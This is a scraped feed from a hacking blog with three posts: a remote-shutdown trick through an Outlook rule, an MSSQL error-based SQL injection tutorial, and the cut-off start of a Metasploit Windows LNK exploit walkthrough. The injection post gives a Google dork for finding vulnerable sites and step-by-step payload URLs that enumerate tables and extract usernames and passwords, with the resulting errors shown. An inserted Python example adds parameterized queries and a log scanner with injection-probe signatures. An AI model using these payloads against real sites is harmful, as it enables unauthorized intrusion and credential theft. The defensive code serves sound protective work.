<br /></div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-8695582603522182412012-01-09T21:22:00.000-08:002012-01-10T03:38:54.801-08:00How To Shutdown A Computer With A Cell Phone<div dir="ltr" style="text-align: left;" trbidi="on">
First you need to create a batch file that performs the shutdown; you can write it yourself.<br />
<br />
* Open Notepad and type the following<br />
<br />
Ex:<br />
<pre><code>c:\windows\system32\shutdown -s -f -t 00</code></pre>
or<br />
<pre><code>shutdown -s -t 10 -c "shutting down"</code></pre>
and save it as shutdown.bat (an executable batch file)<br />
----<br />
----<br />
Now open Microsoft Outlook. I am assuming that you have already configured it for your e-mail. Next we need to make Outlook check your inbox about every minute.<br />
<br />
You can do this by going to Tools->Options. Then click on Mail Setup tab, and then, the Send/Receive button.<br />
<br />
----<br />
Make sure that the <b>Schedule an automatic send/receive every…</b> box is checked, and set the number of minutes to 1 or any interval you like. Now you may close all of these dialog boxes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/b5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/b5.jpg" width="343" /></a></div>
<br />
Now go to Tools-->Rules and Alerts. Click on <i>E-mail Rules</i> tab. In new window select <i>Check messages when they arrive</i> and click Next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/d4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://hackspc.com/wp-content/uploads/2010/06/d4.jpg" width="400" /></a></div>
<br />
On the next page, check <i>on this machine only</i> and <i>with specific words in the subject</i>.<br />
After checking these two options, click the underlined <i>specific words</i> link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/g2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/g2.jpg" width="330" /></a></div>
<br />
The Search Text window will open. In the input field, type the subject keyword that will trigger the shutdown. You can use any word; to prevent accidental execution I used <i>%shutdown%</i> as the trigger. Click the <i>Add</i> button when you are done, then click OK.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/h3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://hackspc.com/wp-content/uploads/2010/06/h3.jpg" width="400" /></a></div>
<br />
Now click Next.<br />
In the next window, check <i>start application</i>. In the lower pane, click the <i>application</i> link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/i3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/i3.jpg" width="330" /></a></div>
<br />
Now the familiar file-open window appears. Set the file type to All Files and select the batch file you created to shut down your PC.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/k1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="http://hackspc.com/wp-content/uploads/2010/06/k1.jpg" width="400" /></a></div>
<br />
Click Next, then Next again (don't choose anything in this step), and finally click the Finish button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/l1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://hackspc.com/wp-content/uploads/2010/06/l1.jpg" width="331" /></a></div>
<br />
You'll see the <i>%shutdown%</i> rule listed in the E-mail Rules tab.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://hackspc.com/wp-content/uploads/2010/06/m.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://hackspc.com/wp-content/uploads/2010/06/m.jpg" width="320" /></a></div>
<br />
Now, when you send a message from your phone to your e-mail address with the subject <b>%shutdown%</b>, the rule launches shutdown.bat, which runs the shutdown command and powers the PC off. Note that the rule matches on the subject alone, so any sender who knows that keyword can shut the machine down.<br />
<br />
<br />
:)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVfAG5AHbOTgGfmoRBkumoYLQcis4hSDSc2XczYDKiiLV-TjyKQte4hyphenhyphenov5-y961X88x27bYVYJk9mwbibXudhAcZy6e8S1Pku37RfFuREAQGNSUvycRhaomY9noi4iBhsDthwzCpo24/s1600/dog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVfAG5AHbOTgGfmoRBkumoYLQcis4hSDSc2XczYDKiiLV-TjyKQte4hyphenhyphenov5-y961X88x27bYVYJk9mwbibXudhAcZy6e8S1Pku37RfFuREAQGNSUvycRhaomY9noi4iBhsDthwzCpo24/s1600/dog.jpg" /></a></div>
<br />
<br /></div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-18102682740940563352011-11-03T00:56:00.000-07:002011-11-03T00:57:01.984-07:00MSSQL Injection<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">MSSQL
Injection<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Ex: google dork <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">inurl:.asp?id=<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">find a result like :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now check whether it is vulnerable or not.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Append a single quotation mark ' at the end:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12’<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">You get an error like this:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error:Microsoft
OLE DB Provider for SQL Server error '80040e14'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Unclosed
quotation mark before the character string ''.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Then you can proceed<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif;">(<b>* here we ask the server to convert system_user to an int; the conversion fails, and the error message in turn discloses the db name that could not be converted to int.</b>)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif;">So it returns an error that reveals the db name, like:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif;">--------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error:
Microsoft OLE DB Provider for SQL Server error '80040e07'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Syntax
error converting the nvarchar value 'usr' to a column of data type int.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">---------------------------------------------------------------<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">In the error it shows the db name as <b>"usr"</b>.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now we try to list all the available tables in the database:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(here information_schema is the database; you can find this in myphp.)</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">We get an error like:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">----------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Microsoft
OLE DB Provider for SQL Server error '80040e07'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error:
Syntax error converting the nvarchar value 'galery' to a column of data type
int.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-----------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(<b>here the table name is galery.</b>)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">But no login credentials will be in the galery table. To find the second table name:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">We get the table name <b>users</b>.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now, to find the columns in the <b>users</b> table:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/site.asp?ID=12+and+1=convert(int,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">We get this:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-----------------------------------------------<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Microsoft
OLE DB Provider for SQL Server error '80040e07'<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Error: Syntax
error converting the nvarchar value 'username' to a column of data type int.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">/some.asp,
line 86</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"> <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">-----------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">To find the second column, follow the same step as for finding the second table name.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Now we need to find the values in the table with the columns username and password:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">http://www.somesite.com/some.asp?ID=12
and+1=convert(int,(select+top+1+username+from+users))<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Do the same to find the value in the password field.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Got it?<o:p></o:p></span></span></div>
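<div class="MsoNormal" style="text-align: justify;">
As an added example (not code from this post), the same injection point seen from the defender's side: a sqlite3 stand-in for the page's some.asp shows why the concatenated query hands back the '80040e14'/'80040e07' driver errors and how a validated, parameterized query closes that hole, and a small scanner then flags the probe signatures the post walks through (trailing quote, convert(int, …), information_schema) in IIS-style log lines. The reduced log layout, the IP addresses and the table contents are all constructed for the example.</div>

```python
import re
import sqlite3
from urllib.parse import parse_qsl

# --- 1. Why the probes in the post produce those errors, and the fix --------
# sqlite3 is only a stand-in for SQL Server (assumption: some.asp reads ID
# from the query string and pastes it straight into the SQL text).

def make_db():
    """Constructed sample data: one row mirroring the 'usr' value in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (12, 'usr', 'constructed-secret')")
    return conn

def lookup_unsafe(conn, raw_id):
    """Vulnerable pattern: the ID is concatenated into the statement.

    A stray quote breaks the parser ('Unclosed quotation mark' in the post),
    and because the raw driver error is handed back to the caller, the error
    text itself becomes a data channel (the '80040e07' messages in the post)."""
    sql = "SELECT username FROM users WHERE id = " + raw_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "DB error: " + str(exc)   # leaks the driver message to the client

def lookup_safe(conn, raw_id):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    The input can no longer alter the statement's structure, and nothing from
    the database driver is echoed back on bad input."""
    if not raw_id.isdigit():
        return []                       # reject; log server-side if desired
    return conn.execute(
        "SELECT username FROM users WHERE id = ?", (int(raw_id),)
    ).fetchall()

# --- 2. Spotting the same probes in web server logs -------------------------
# One signature per step the post walks through.
PROBE_PATTERNS = [
    ("trailing quote on numeric param", re.compile(r"^\d+'$")),
    ("convert(int, ...) error-based probe", re.compile(r"convert\s*\(\s*int\s*,", re.I)),
    ("information_schema enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
]

def match_probes(query_string):
    """Return the labels of every signature matching a decoded query value."""
    hits = []
    for _name, value in parse_qsl(query_string, keep_blank_values=True):
        for label, pattern in PROBE_PATTERNS:
            if pattern.search(value) and label not in hits:
                hits.append(label)
    return hits

# Constructed sample log in a reduced W3C-style layout (a real IIS log has
# more fields and writes '-' for an empty query):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2011-11-03 08:55:40 203.0.113.9 GET /some.asp ID=12 200
2011-11-03 08:55:52 203.0.113.9 GET /some.asp ID=12%27 500
2011-11-03 08:56:01 203.0.113.9 GET /some.asp ID=12+and+1=convert(int,system_user) 500
2011-11-03 08:56:20 203.0.113.9 GET /some.asp ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables)) 500
2011-11-03 08:57:03 198.51.100.4 GET /some.asp ID=15 200
2011-11-03 08:57:10 198.51.100.4 GET /search.asp q=convert+pdf+to+int 200
"""

def scan_log(log_text):
    """Flag requests carrying any probe signature.

    Returns (c-ip, cs-uri-stem, labels, sc-status) for flagged lines only; a
    500 status beside a flagged query is the tell-tale of error-based probing."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        _date, _time, c_ip, _method, stem, query, status = parts[:7]
        labels = match_probes(query)
        if labels:
            flagged.append((c_ip, stem, labels, int(status)))
    return flagged

if __name__ == "__main__":
    db = make_db()
    print("unsafe, 12' ->", lookup_unsafe(db, "12'"))
    print("safe,   12' ->", lookup_safe(db, "12'"))
    for entry in scan_log(SAMPLE_LOG):
        print("flagged:", entry)
```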
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 13pt; line-height: 115%;">[ * <b>Warning: I'm not responsible for your actions; this is for educational purposes only. ]<o:p></o:p></b></span></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-83937160917659409862011-10-25T01:49:00.000-07:002011-10-25T01:49:30.902-07:00Windows lnk Exploit<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background: white; color: black; font-family: "Arial","sans-serif";">Hack the system using the windows lnk exploit:</span></u></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Update metasploit.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Go to the prompt and change into the framework directory.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">#./msfconsole<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The msf> prompt opens.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
